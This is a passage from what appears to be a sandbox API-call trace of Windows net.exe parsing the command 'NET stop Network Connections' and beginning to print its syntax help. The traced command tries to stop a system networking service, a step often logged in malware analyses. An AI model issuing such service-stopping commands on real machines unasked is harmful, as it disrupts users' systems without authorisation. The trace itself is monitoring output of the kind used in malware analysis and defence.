(_String1=0x1f1ffc, _String2="Network") returned 9 [0297.579] _wcsicmp (_String1="work", _String2="Network") returned 9 [0297.579] _wcsicmp (_String1="wksta", _String2="Network") returned 9 [0297.579] _wcsicmp (_String1="prdr", _String2="Network") returned 2 [0297.579] _wcsicmp (_String1="devrdr", _String2="Network") returned -10 [0297.579] _wcsicmp (_String1="lanmanworkstation", _String2="Network") returned -2 [0297.579] _wcsicmp (_String1="server", _String2="Network") returned 5 [0297.579] _wcsicmp (_String1="svr", _String2="Network") returned 5 [0297.580] _wcsicmp (_String1="srv", _String2="Network") returned 5 [0297.580] _wcsicmp (_String1="lanmanserver", _String2="Network") returned -2 [0297.580] _wcsicmp (_String1="alerter", _String2="Network") returned -13 [0297.580] _wcsicmp (_String1="netlogon", _String2="Network") returned -11 [0297.580] _wcsicmp (_String1="accounts", _String2="Connections") returned -2 [0297.580] _wcsicmp (_String1="computer", _String2="Connections") returned -1 [0297.580] _wcsicmp (_String1="config", _String2="Connections") returned -8 [0297.580] _wcsicmp (_String1="continue", _String2="Connections") returned 6 [0297.580] _wcsicmp (_String1="cont", _String2="Connections") returned 6 [0297.580] _wcsicmp (_String1="file", _String2="Connections") returned 3 [0297.580] _wcsicmp (_String1="files", _String2="Connections") returned 3 [0297.580] _wcsicmp (_String1="group", _String2="Connections") returned 4 [0297.580] _wcsicmp (_String1="groups", _String2="Connections") returned 4 [0297.580] _wcsicmp (_String1="help", _String2="Connections") returned 5 [0297.580] _wcsicmp (_String1="helpmsg", _String2="Connections") returned 5 [0297.580] _wcsicmp (_String1="localgroup", _String2="Connections") returned 9 [0297.580] _wcsicmp (_String1="pause", _String2="Connections") returned 13 [0297.580] _wcsicmp (_String1="session", _String2="Connections") returned 16 [0297.580] _wcsicmp (_String1="sessions", _String2="Connections") returned 16 [0297.581] _wcsicmp (_String1="sess", _String2="Connections") returned 16 [0297.581] _wcsicmp (_String1="share", _String2="Connections") returned 16 [0297.581] _wcsicmp (_String1="start", _String2="Connections") returned 16 [0297.581] _wcsicmp (_String1="stats", _String2="Connections") returned 16 [0297.581] _wcsicmp (_String1="statistics", _String2="Connections") returned 16 [0297.581] _wcsicmp (_String1="stop", _String2="Connections") returned 16 [0297.581] _wcsicmp (_String1="time", _String2="Connections") returned 17 [0297.581] _wcsicmp (_String1="user", _String2="Connections") returned 18 [0297.581] _wcsicmp (_String1="users", _String2="Connections") returned 18 [0297.581] _wcsicmp (_String1="msg", _String2="Connections") returned 10 [0297.581] _wcsicmp (_String1="messenger", _String2="Connections") returned 10 [0297.581] _wcsicmp (_String1="receiver", _String2="Connections") returned 15 [0297.581] _wcsicmp (_String1="rcv", _String2="Connections") returned 15 [0297.581] _wcsicmp (_String1="netpopup", _String2="Connections") returned 11 [0297.581] _wcsicmp (_String1="redirector", _String2="Connections") returned 15 [0297.581] _wcsicmp (_String1="redir", _String2="Connections") returned 15 [0297.581] _wcsicmp (_String1="rdr", _String2="Connections") returned 15 [0297.581] _wcsicmp (_String1="workstation", _String2="Connections") returned 20 [0297.581] _wcsicmp (_String1="work", _String2="Connections") returned 20 [0297.581] _wcsicmp (_String1="wksta", _String2="Connections") returned 20 [0297.581] _wcsicmp (_String1="prdr", _String2="Connections") returned 13 [0297.582] _wcsicmp (_String1="devrdr", _String2="Connections") returned 1 [0297.582] _wcsicmp (_String1="lanmanworkstation", _String2="Connections") returned 9 [0297.582] _wcsicmp (_String1="server", _String2="Connections") returned 16 [0297.582] _wcsicmp (_String1="svr", _String2="Connections") returned 16 [0297.582] _wcsicmp (_String1="srv", _String2="Connections") returned 16 [0297.582] _wcsicmp (_String1="lanmanserver", _String2="Connections") returned 9 [0297.582] _wcsicmp (_String1="alerter", _String2="Connections") returned -2 [0297.582] _wcsicmp (_String1="netlogon", _String2="Connections") returned 11 [0297.582] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0297.582] SetThreadUILanguage (LangId=0x0) returned 0x409 [0297.583] LoadLibraryExW (lpLibFileName="neth.dll", hFile=0x0, dwFlags=0x822) returned 0x190002 [0297.584] FormatMessageW (in: dwFlags=0x1900, lpSource=0x190002, dwMessageId=0xc5d, dwLanguageId=0x0, lpBuffer=0x11f7a8, nSize=0x0, Arguments=0x11f7a4 | out: lpBuffer="렠Яﰰ\x11繴 ౝ") returned 0xff [0297.589] wcstok (in: _String="CONTINUE: CONT$\r\nFILE: FILES$\r\nGROUP: GROUPS$\r\nREPLICATOR: REPL, REPLICATOR$\r\nSESSION: SESSIONS, SESS$\r\nSTATISTICS: STATS$\r\nUSER: USERS$\r\nWORKSTATION: REDIRECTOR, REDIR, RDR, WORK, WKSTA, PRDR, DEVRDR$\r\nSERVER: SVR, SRV$\r\n", _Delimiter="$", _Context=0x1eb | out: _String="CONTINUE: CONT", _Context=0x1eb) returned="CONTINUE: CONT" [0297.589] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x1eb | out: _String=0x0, _Context=0x1eb) returned="\r\nFILE: FILES" [0297.589] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x1eb | out: _String=0x0, _Context=0x1eb) returned="\r\nGROUP: GROUPS" [0297.589] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x1eb | out: _String=0x0, _Context=0x1eb) returned="\r\nREPLICATOR: REPL, REPLICATOR" [0297.589] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x1eb | out: _String=0x0, _Context=0x1eb) returned="\r\nSESSION: SESSIONS, SESS" [0297.589] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x1eb | out: _String=0x0, _Context=0x1eb) returned="\r\nSTATISTICS: STATS" [0297.589] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x1eb | out: _String=0x0, _Context=0x1eb) returned="\r\nUSER: USERS" [0297.589] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x1eb | out: _String=0x0, _Context=0x1eb) returned="\r\nWORKSTATION: REDIRECTOR, REDIR, RDR, WORK, WKSTA, PRDR, DEVRDR" [0297.589] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x1eb | out: _String=0x0, _Context=0x1eb) returned="\r\nSERVER: SVR, SRV" [0297.589] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x1eb | out: _String=0x0, _Context=0x1eb) returned="\r\n" [0297.589] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x1eb | out: _String=0x0, _Context=0x1eb) returned 0x0 [0297.589] wcstok (in: _String="CONTINUE: CONT", _Delimiter=":,$", _Context=0x1eb | out: _String="CONTINUE", _Context=0x1eb) returned="CONTINUE" [0297.589] wcsspn (_String="CONTINUE", _Control="\x09\n\x0b\x0c\r ") returned 0x0 [0297.589] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x42fb820 | out: _String=0x0, _Context=0x42fb820) returned=" CONT" [0297.590] wcsspn (_String=" CONT", _Control="\x09\n\x0b\x0c\r ") returned 0x5 [0297.590] _wcsicmp (_String1="CONT", _String2="stop") returned -16 [0297.590] _wcsicmp (_String1="CONT", _String2="Network") returned -11 [0297.590] _wcsicmp (_String1="CONT", _String2="Connections") returned 6 [0297.590] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x1eb | out: _String=0x0, _Context=0x1eb) returned 0x0 [0297.590] wcstok (in: _String="\r\nFILE: FILES", _Delimiter=":,$", _Context=0x1eb | out: _String="\r\nFILE", _Context=0x1eb) returned="\r\nFILE" [0297.590] wcsspn (_String="\r\nFILE", _Control="\x09\n\x0b\x0c\r ") returned 0x2 [0297.590] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x42fb846 | out: _String=0x0, _Context=0x42fb846) returned=" FILES" [0297.590] wcsspn (_String=" FILES", _Control="\x09\n\x0b\x0c\r ") returned 0x5 [0297.590] _wcsicmp (_String1="FILES", _String2="stop") returned -13 [0297.590] _wcsicmp (_String1="FILES", _String2="Network") returned -8 [0297.590] _wcsicmp (_String1="FILES", _String2="Connections") returned 3 [0297.590] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x1eb | out: _String=0x0, _Context=0x1eb) returned 0x0 [0297.590] wcstok (in: _String="\r\nGROUP: GROUPS", _Delimiter=":,$", _Context=0x1eb | out: _String="\r\nGROUP", _Context=0x1eb) returned="\r\nGROUP" [0297.590] wcsspn (_String="\r\nGROUP", _Control="\x09\n\x0b\x0c\r ") returned 0x2 [0297.590] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x42fb86a | out: _String=0x0, _Context=0x42fb86a) returned=" GROUPS" [0297.590] wcsspn (_String=" GROUPS", _Control="\x09\n\x0b\x0c\r ") returned 0x5 [0297.590] _wcsicmp (_String1="GROUPS", _String2="stop") returned -12 [0297.591] _wcsicmp (_String1="GROUPS", _String2="Network") returned -7 [0297.591] _wcsicmp (_String1="GROUPS", _String2="Connections") returned 4 [0297.591] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x1eb | out: _String=0x0, _Context=0x1eb) returned 0x0 [0297.591] wcstok (in: _String="\r\nREPLICATOR: REPL, REPLICATOR", _Delimiter=":,$", _Context=0x1eb | out: _String="\r\nREPLICATOR", _Context=0x1eb) returned="\r\nREPLICATOR" [0297.591] wcsspn (_String="\r\nREPLICATOR", _Control="\x09\n\x0b\x0c\r ") returned 0x2 [0297.591] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x42fb892 | out: _String=0x0, _Context=0x42fb892) returned=" REPL" [0297.591] wcsspn (_String=" REPL", _Control="\x09\n\x0b\x0c\r ") returned 0x1 [0297.591] _wcsicmp (_String1="REPL", _String2="stop") returned -1 [0297.591] _wcsicmp (_String1="REPL", _String2="Network") returned 4 [0297.591] _wcsicmp (_String1="REPL", _String2="Connections") returned 15 [0297.591] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x1eb | out: _String=0x0, _Context=0x1eb) returned=" REPLICATOR" [0297.591] wcsspn (_String=" REPLICATOR", _Control="\x09\n\x0b\x0c\r ") returned 0x1 [0297.591] _wcsicmp (_String1="REPLICATOR", _String2="stop") returned -1 [0297.591] _wcsicmp (_String1="REPLICATOR", _String2="Network") returned 4 [0297.591] _wcsicmp (_String1="REPLICATOR", _String2="Connections") returned 15 [0297.591] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x1eb | out: _String=0x0, _Context=0x1eb) returned 0x0 [0297.591] wcstok (in: _String="\r\nSESSION: SESSIONS, SESS", _Delimiter=":,$", _Context=0x1eb | out: _String="\r\nSESSION", _Context=0x1eb) returned="\r\nSESSION" [0297.591] wcsspn (_String="\r\nSESSION", _Control="\x09\n\x0b\x0c\r ") returned 0x2 [0297.591] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x42fb8d0 | out: _String=0x0, _Context=0x42fb8d0) returned=" SESSIONS" [0297.591] wcsspn (_String=" SESSIONS", _Control="\x09\n\x0b\x0c\r ") returned 0x5 [0297.592] _wcsicmp (_String1="SESSIONS", _String2="stop") returned -15 [0297.592] _wcsicmp (_String1="SESSIONS", _String2="Network") returned 5 [0297.592] _wcsicmp (_String1="SESSIONS", _String2="Connections") returned 16 [0297.592] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x1eb | out: _String=0x0, _Context=0x1eb) returned=" SESS" [0297.592] wcsspn (_String=" SESS", _Control="\x09\n\x0b\x0c\r ") returned 0x1 [0297.592] _wcsicmp (_String1="SESS", _String2="stop") returned -15 [0297.592] _wcsicmp (_String1="SESS", _String2="Network") returned 5 [0297.592] _wcsicmp (_String1="SESS", _String2="Connections") returned 16 [0297.592] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x1eb | out: _String=0x0, _Context=0x1eb) returned 0x0 [0297.592] wcstok (in: _String="\r\nSTATISTICS: STATS", _Delimiter=":,$", _Context=0x1eb | out: _String="\r\nSTATISTICS", _Context=0x1eb) returned="\r\nSTATISTICS" [0297.592] wcsspn (_String="\r\nSTATISTICS", _Control="\x09\n\x0b\x0c\r ") returned 0x2 [0297.592] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x42fb90c | out: _String=0x0, _Context=0x42fb90c) returned=" STATS" [0297.592] wcsspn (_String=" STATS", _Control="\x09\n\x0b\x0c\r ") returned 0x5 [0297.592] _wcsicmp (_String1="STATS", _String2="stop") returned -14 [0297.592] _wcsicmp (_String1="STATS", _String2="Network") returned 5 [0297.592] _wcsicmp (_String1="STATS", _String2="Connections") returned 16 [0297.592] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x1eb | out: _String=0x0, _Context=0x1eb) returned 0x0 [0297.592] wcstok (in: _String="\r\nUSER: USERS", _Delimiter=":,$", _Context=0x1eb | out: _String="\r\nUSER", _Context=0x1eb) returned="\r\nUSER" [0297.592] wcsspn (_String="\r\nUSER", _Control="\x09\n\x0b\x0c\r ") returned 0x2 [0297.592] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x42fb93c | out: _String=0x0, _Context=0x42fb93c) returned=" USERS" [0297.592] wcsspn (_String=" USERS", _Control="\x09\n\x0b\x0c\r ") returned 0x5 [0297.592] _wcsicmp (_String1="USERS", _String2="stop") returned 2 [0297.593] _wcsicmp (_String1="USERS", _String2="Network") returned 7 [0297.593] _wcsicmp (_String1="USERS", _String2="Connections") returned 18 [0297.593] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x1eb | out: _String=0x0, _Context=0x1eb) returned 0x0 [0297.593] wcstok (in: _String="\r\nWORKSTATION: REDIRECTOR, REDIR, RDR, WORK, WKSTA, PRDR, DEVRDR", _Delimiter=":,$", _Context=0x1eb | out: _String="\r\nWORKSTATION", _Context=0x1eb) returned="\r\nWORKSTATION" [0297.593] wcsspn (_String="\r\nWORKSTATION", _Control="\x09\n\x0b\x0c\r ") returned 0x2 [0297.593] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x42fb960 | out: _String=0x0, _Context=0x42fb960) returned=" REDIRECTOR" [0297.593] wcsspn (_String=" REDIRECTOR", _Control="\x09\n\x0b\x0c\r ") returned 0x5 [0297.593] _wcsicmp (_String1="REDIRECTOR", _String2="stop") returned -1 [0297.593] _wcsicmp (_String1="REDIRECTOR", _String2="Network") returned 4 [0297.593] _wcsicmp (_String1="REDIRECTOR", _String2="Connections") returned 15 [0297.593] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x1eb | out: _String=0x0, _Context=0x1eb) returned=" REDIR" [0297.593] wcsspn (_String=" REDIR", _Control="\x09\n\x0b\x0c\r ") returned 0x1 [0297.593] _wcsicmp (_String1="REDIR", _String2="stop") returned -1 [0297.593] _wcsicmp (_String1="REDIR", _String2="Network") returned 4 [0297.593] _wcsicmp (_String1="REDIR", _String2="Connections") returned 15 [0297.593] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x1eb | out: _String=0x0, _Context=0x1eb) returned=" RDR" [0297.593] wcsspn (_String=" RDR", _Control="\x09\n\x0b\x0c\r ") returned 0x1 [0297.593] _wcsicmp (_String1="RDR", _String2="stop") returned -1 [0297.594] _wcsicmp (_String1="RDR", _String2="Network") returned 4 [0297.594] _wcsicmp (_String1="RDR", _String2="Connections") returned 15 [0297.594] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x1eb | out: _String=0x0, _Context=0x1eb) returned=" WORK" [0297.594] wcsspn (_String=" WORK", _Control="\x09\n\x0b\x0c\r ") returned 0x1 [0297.594] _wcsicmp (_String1="WORK", _String2="stop") returned 4 [0297.594] _wcsicmp (_String1="WORK", _String2="Network") returned 9 [0297.594] _wcsicmp (_String1="WORK", _String2="Connections") returned 20 [0297.594] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x1eb | out: _String=0x0, _Context=0x1eb) returned=" WKSTA" [0297.594] wcsspn (_String=" WKSTA", _Control="\x09\n\x0b\x0c\r ") returned 0x1 [0297.594] _wcsicmp (_String1="WKSTA", _String2="stop") returned 4 [0297.594] _wcsicmp (_String1="WKSTA", _String2="Network") returned 9 [0297.594] _wcsicmp (_String1="WKSTA", _String2="Connections") returned 20 [0297.594] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x1eb | out: _String=0x0, _Context=0x1eb) returned=" PRDR" [0297.594] wcsspn (_String=" PRDR", _Control="\x09\n\x0b\x0c\r ") returned 0x1 [0297.594] _wcsicmp (_String1="PRDR", _String2="stop") returned -3 [0297.594] _wcsicmp (_String1="PRDR", _String2="Network") returned 2 [0297.594] _wcsicmp (_String1="PRDR", _String2="Connections") returned 13 [0297.594] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x1eb | out: _String=0x0, _Context=0x1eb) returned=" DEVRDR" [0297.594] wcsspn (_String=" DEVRDR", _Control="\x09\n\x0b\x0c\r ") returned 0x1 [0297.594] _wcsicmp (_String1="DEVRDR", _String2="stop") returned -15 [0297.594] _wcsicmp (_String1="DEVRDR", _String2="Network") returned -10 [0297.594] _wcsicmp (_String1="DEVRDR", _String2="Connections") returned 1 [0297.594] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x1eb | out: _String=0x0, _Context=0x1eb) returned 0x0 [0297.594] wcstok (in: _String="\r\nSERVER: SVR, SRV", _Delimiter=":,$", _Context=0x1eb | out: _String="\r\nSERVER", _Context=0x1eb) returned="\r\nSERVER" [0297.594] wcsspn (_String="\r\nSERVER", _Control="\x09\n\x0b\x0c\r ") returned 0x2 [0297.595] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x42fb9ea | out: _String=0x0, _Context=0x42fb9ea) returned=" SVR" [0297.595] wcsspn (_String=" SVR", _Control="\x09\n\x0b\x0c\r ") returned 0x5 [0297.595] _wcsicmp (_String1="SVR", _String2="stop") returned 2 [0297.595] _wcsicmp (_String1="SVR", _String2="Network") returned 5 [0297.595] _wcsicmp (_String1="SVR", _String2="Connections") returned 16 [0297.595] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x1eb | out: _String=0x0, _Context=0x1eb) returned=" SRV" [0297.595] wcsspn (_String=" SRV", _Control="\x09\n\x0b\x0c\r ") returned 0x2 [0297.595] _wcsicmp (_String1="SRV", _String2="stop") returned -2 [0297.595] _wcsicmp (_String1="SRV", _String2="Network") returned 5 [0297.595] _wcsicmp (_String1="SRV", _String2="Connections") returned 16 [0297.595] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x1eb | out: _String=0x0, _Context=0x1eb) returned 0x0 [0297.595] FormatMessageW (in: dwFlags=0x1900, lpSource=0x190002, dwMessageId=0xc5e, dwLanguageId=0x0, lpBuffer=0x11f7a8, nSize=0x0, Arguments=0x11f7a4 | out: lpBuffer="苀Яﰰ\x11老 ౞") returned 0x1c [0297.595] wcstok (in: _String="NAMES$\r\nSYNTAX$\r\nSERVICES$\r\n", _Delimiter="$", _Context=0x1eb | out: _String="NAMES", _Context=0x1eb) returned="NAMES" [0297.595] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x1eb | out: _String=0x0, _Context=0x1eb) returned="\r\nSYNTAX" [0297.595] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x1eb | out: _String=0x0, _Context=0x1eb) returned="\r\nSERVICES" [0297.595] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x1eb | out: _String=0x0, _Context=0x1eb) returned="\r\n" [0297.595] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x1eb | out: _String=0x0, _Context=0x1eb) returned 0x0 [0297.595] wcsspn (_String="NAMES", _Control="\x09\n\x0b\x0c\r ") returned 0x0 [0297.595] _wcsicmp (_String1="stop", _String2="NAMES") returned 5 [0297.595] wcsspn (_String="\r\nSYNTAX", _Control="\x09\n\x0b\x0c\r ") returned 0x2 [0297.595] _wcsicmp (_String1="stop", _String2="SYNTAX") returned -5 [0297.595] wcsspn (_String="\r\nSERVICES", _Control="\x09\n\x0b\x0c\r ") returned 0x2 [0297.596] _wcsicmp (_String1="stop", _String2="SERVICES") returned 15 [0297.596] wcscpy_s (in: _Destination=0x217698, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0297.596] LoadLibraryExW (lpLibFileName="NETMSG", hFile=0x0, dwFlags=0x20) returned 0x1e0002 [0297.597] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x1e0002, dwMessageId=0x111d, dwLanguageId=0x0, lpBuffer=0x217ca8, nSize=0x800, Arguments=0x217450 | out: lpBuffer="The syntax of this command is:\r\n") returned 0x20 [0297.598] GetFileType (hFile=0x40) returned 0x2 [0297.598] GetConsoleMode (in: hConsoleHandle=0x40, lpMode=0x11f770 | out: lpMode=0x11f770) returned 1 [0297.598] WriteConsoleW (in: hConsoleOutput=0x40, lpBuffer=0x217ca8*, nNumberOfCharsToWrite=0x20, lpNumberOfCharsWritten=0x11f77c, lpReserved=0x0 | out: lpBuffer=0x217ca8*, lpNumberOfCharsWritten=0x11f77c*=0x20) returned 1 [0297.601] GetFileType (hFile=0x40) returned 0x2 [0297.601] GetConsoleMode (in: hConsoleHandle=0x40, lpMode=0x11f770 | out: lpMode=0x11f770) returned 1 [0297.601] WriteConsoleW (in: hConsoleOutput=0x40, lpBuffer=0x1f1250*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x11f77c, lpReserved=0x0 | out: lpBuffer=0x1f1250*, lpNumberOfCharsWritten=0x11f77c*=0x2) returned 1 [0297.601] wcscpy_s (in: _Destination=0x11f818, _SizeInWords=0x200, _Source="NET" | out: _Destination="NET") returned 0x0 [0297.601] wcsncat_s (in: _Destination="NET", _SizeInWords=0x200, _Source=" ", _MaxCount=0xffffffff | out: _Destination="NET ") returned 0x0 [0297.601] wcsncat_s (in: _Destination="NET ", _SizeInWords=0x200, _Source="stop", _MaxCount=0xffffffff | out: _Destination="NET stop") returned 0x0 [0297.602] wcsncat_s (in: _Destination="NET stop", _SizeInWords=0x200, _Source=" ", _MaxCount=0xffffffff | out: _Destination="NET stop ") returned 0x0 [0297.602] wcsncat_s (in: _Destination="NET stop ", _SizeInWords=0x200, _Source="Network", _MaxCount=0xffffffff | out: _Destination="NET stop Network") returned 0x0 [0297.602] wcsncat_s (in: _Destination="NET stop Network", _SizeInWords=0x200, _Source=" ", _MaxCount=0xffffffff | out: _Destination="NET stop Network ") returned 0x0 [0297.602] wcsncat_s (in: _Destination="NET stop Network ", _SizeInWords=0x200, _Source="Connections", _MaxCount=0xffffffff | out: _Destination="NET stop Network Connections") returned 0x0 [0297.602] FormatMessageW (in: dwFlags=0x1900, lpSource=0x190002, dwMessageId=0xbfc, dwLanguageId=0x0, lpBuffer=0x11f78c, nSize=0x0, Arguments=0x11f788 | out: lpBuffer="숰Я\x11筴 ௼") returned 0xad [0297.602] _wcsnicmp (_String1="NET stop Network Connections", _String2="NET ACCOUNTS\r\n[/FORCELOGOFF:", _MaxCount=0x1c) returned 18 [0297.602] LocalFree (hMem=0x42fc230) returned 0x0 [0297.602] FormatMessageW (in: dwFlags=0x1900, lpSource=0x190002, dwMessageId=0xbff, dwLanguageId=0x0, lpBuffer=0x11f78c, nSize=0x0, Arguments=0x11f788 | out: lpBuffer="숰Я\x11筴 ௿") returned 0x2e [0297.602] _wcsnicmp (_String1="NET stop Network Connections", _String2="NET COMPUTER\r\n\\\\computername", _MaxCount=0x1c) returned 16 [0297.602] LocalFree (hMem=0x42fc230) returned 0x0 [0297.602] FormatMessageW (in: dwFlags=0x1900, lpSource=0x190002, dwMessageId=0xc02, dwLanguageId=0x0, lpBuffer=0x11f78c, nSize=0x0, Arguments=0x11f788 | out: lpBuffer="숰Я\x11筴 ం") returned 0x7d [0297.602] _wcsnicmp (_String1="NET stop Network Connections", _String2="NET CONFIG SERVER\r\n[/AUTODIS", _MaxCount=0x1c) returned 16 [0297.602] LocalFree (hMem=0x42fc230) returned 0x0 [0297.602] FormatMessageW (in: dwFlags=0x1900, lpSource=0x190002, dwMessageId=0xc05, dwLanguageId=0x0, lpBuffer=0x11f78c, nSize=0x0, Arguments=0x11f788 | out: lpBuffer="숰Я\x11筴 అ") returned 0x26 [0297.602] _wcsnicmp (_String1="NET stop Network Connections", _String2="NET CONFIG\r\n[SERVER | WORKST", _MaxCount=0x1c) returned 16 [0297.602] LocalFree (hMem=0x42fc230) returned 0x0 [0297.602] FormatMessageW (in: dwFlags=0x1900, lpSource=0x190002, dwMessageId=0xc08, dwLanguageId=0x0, lpBuffer=0x11f78c, nSize=0x0, Arguments=0x11f788 | out: lpBuffer="褨Я\x11筴 ఈ") returned 0x19 [0297.602] _wcsnicmp (_String1="NET stop Network Connections", _String2="NET CONTINUE\r\nservice\r\n\r\n", _MaxCount=0x1c) returned 16 [0297.602] LocalFree (hMem=0x42f8928) returned 0x0 [0297.603] FormatMessageW (in: dwFlags=0x1900, lpSource=0x190002, dwMessageId=0xc0b, dwLanguageId=0x0, lpBuffer=0x11f78c, nSize=0x0, Arguments=0x11f788 | out: lpBuffer="숰Я\x11筴 ఋ") returned 0x1b [0297.603] _wcsnicmp (_String1="NET stop Network Connections", _String2="NET FILE\r\n[id [/CLOSE]]\r\n\r\n", _MaxCount=0x1c) returned 13 [0297.603] LocalFree (hMem=0x42fc230) returned 0x0 [0297.603] FormatMessageW (in: dwFlags=0x1900, lpSource=0x190002, dwMessageId=0xc0e, dwLanguageId=0x0, lpBuffer=0x11f78c, nSize=0x0, Arguments=0x11f788 | out: lpBuffer="숰Я\x11筴 ఎ") returned 0xbe [0297.603] _wcsnicmp (_String1="NET stop Network Connections", _String2="NET GROUP\r\n[groupname [/COMM", _MaxCount=0x1c) returned 12 [0297.603] LocalFree (hMem=0x42fc230) returned 0x0 [0297.603] FormatMessageW (in: dwFlags=0x1900, lpSource=0x190002, dwMessageId=0xc11, dwLanguageId=0x0, lpBuffer=0x11f78c, nSize=0x0, Arguments=0x11f788 | out: lpBuffer="숰Я\x11筴 ఑") returned 0x33 [0297.603] _wcsnicmp (_String1="NET stop Network Connections", _String2="NET HELP\r\ncommand\r\n -or-", _MaxCount=0x1c) returned 11 [0297.603] LocalFree (hMem=0x42fc230) returned 0x0 [0297.603] FormatMessageW (in: dwFlags=0x1900, lpSource=0x190002, dwMessageId=0xc14, dwLanguageId=0x0, lpBuffer=0x11f78c, nSize=0x0, Arguments=0x11f788 | out: lpBuffer="褨Я\x11筴 ఔ") returned 0x19 [0297.603] _wcsnicmp (_String1="NET stop Network Connections", _String2="NET HELPMSG\r\nmessage#\r\n\r\n", _MaxCount=0x1c) returned 11 [0297.603] LocalFree (hMem=0x42f8928) returned 0x0 [0297.603] FormatMessageW (in: dwFlags=0x1900, lpSource=0x190002, dwMessageId=0xc17, dwLanguageId=0x0, lpBuffer=0x11f78c, nSize=0x0, Arguments=0x11f788 | out: lpBuffer="숰Я\x11筴 గ") returned 0xc1 [0297.603] _wcsnicmp (_String1="NET stop Network Connections", _String2="NET LOCALGROUP\r\n[groupname [", _MaxCount=0x1c) returned 7 [0297.603] LocalFree (hMem=0x42fc230) returned 0x0 [0297.603] FormatMessageW (in: dwFlags=0x1900, lpSource=0x190002, dwMessageId=0xc1a, dwLanguageId=0x0, lpBuffer=0x11f78c, nSize=0x0, Arguments=0x11f788 | out: lpBuffer="褨Я\x11筴 చ") returned 0x16 [0297.603] _wcsnicmp (_String1="NET stop Network Connections", _String2="NET PAUSE\r\nservice\r\n\r\n", _MaxCount=0x1c) returned 3 [0297.603] LocalFree (hMem=0x42f8928) returned 0x0 [0297.603] FormatMessageW (in: dwFlags=0x1900, lpSource=0x190002, dwMessageId=0xc1d, dwLanguageId=0x0, lpBuffer=0x11f78c, nSize=0x0, Arguments=0x11f788 | out: lpBuffer="숰Я\x11筴 ఝ") returned 0x33 [0297.603] _wcsnicmp (_String1="NET stop Network Connections", _String2="NET SESSION\r\n[\\\\computername", _MaxCount=0x1c) returned 15 [0297.603] LocalFree (hMem=0x42fc230) returned 0x0 [0297.603] FormatMessageW (in: dwFlags=0x1900, lpSource=0x190002, dwMessageId=0xc20, dwLanguageId=0x0, lpBuffer=0x11f78c, nSize=0x0, Arguments=0x11f788 | out: lpBuffer="숰Я\x11筴 ఠ") returned 0x234 [0297.604] _wcsnicmp (_String1="NET stop Network Connections", _String2="NET SHARE\r\nsharename\r\n ", _MaxCount=0x1c) returned 12 [0297.604] LocalFree (hMem=0x42fc230) returned 0x0 [0297.604] FormatMessageW (in: dwFlags=0x1900, lpSource=0x190002, dwMessageId=0xc23, dwLanguageId=0x0, lpBuffer=0x11f78c, nSize=0x0, Arguments=0x11f788 | out: lpBuffer="薸Я\x11筴 ణ") returned 0x13 [0297.604] _wcsnicmp (_String1="NET stop Network Connections", _String2="NET START BROWSER\r\n", _MaxCount=0x1c) returned 14 [0297.604] LocalFree (hMem=0x42f85b8) returned 0x0 [0297.604] FormatMessageW (in: dwFlags=0x1900, lpSource=0x190002, dwMessageId=0xc26, dwLanguageId=0x0, lpBuffer=0x11f78c, nSize=0x0, Arguments=0x11f788 | out: lpBuffer="褨Я\x11筴 ద") returned 0x14 [0297.604] _wcsnicmp (_String1="NET stop Network Connections", _String2="NET START EVENTLOG\r\n", _MaxCount=0x1c) returned 14 [0297.604] LocalFree (hMem=0x42f8928) returned 0x0 [0297.604] FormatMessageW (in: dwFlags=0x1900, lpSource=0x190002, dwMessageId=0xc29, dwLanguageId=0x0, lpBuffer=0x11f78c, nSize=0x0, Arguments=0x11f788 | out: lpBuffer="褨Я\x11筴 ఩") returned 0x14 [0297.605] _wcsnicmp (_String1="NET stop Network Connections", _String2="NET START NETLOGON\r\n", _MaxCount=0x1c) returned 14 [0297.605] LocalFree (hMem=0x42f8928) returned 0x0 [0297.605] FormatMessageW (in: dwFlags=0x1900, lpSource=0x190002, dwMessageId=0xc2c, dwLanguageId=0x0, lpBuffer=0x11f78c, nSize=0x0, Arguments=0x11f788 | out: lpBuffer="蒠Я\x11筴 బ") returned 0x11 [0297.605] 